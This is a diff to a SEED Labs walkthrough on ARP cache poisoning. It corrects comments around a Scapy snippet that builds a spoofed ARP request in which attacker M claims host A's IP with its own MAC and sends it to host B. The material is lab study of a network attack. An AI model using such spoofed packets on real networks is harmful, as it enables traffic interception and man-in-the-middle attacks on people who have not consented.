OmarMiniesy/Walkthroughs/SEED Labs/Network Security/ARP Cache Poisoning Attack Lab.md

 B_MAC = "02:42:0a:09:00:06"
 M_MAC = "02:42:0a:09:00:69"

 # Ethernet layer.
-Sending a packet from M to A.
+Sending a packet from M to B.
 E = Ether(src=M_MAC, dst= B_MAC)

 # ARP layer.
-Sending a packet from M to A with B IP AND M MAC.
+Sending a packet from M to B with A IP AND M MAC.
 A = ARP(hwsrc=M_MAC, psrc=A_IP, hwdst=B_MAC, pdst=B_IP, op=1)

 pkt = E/A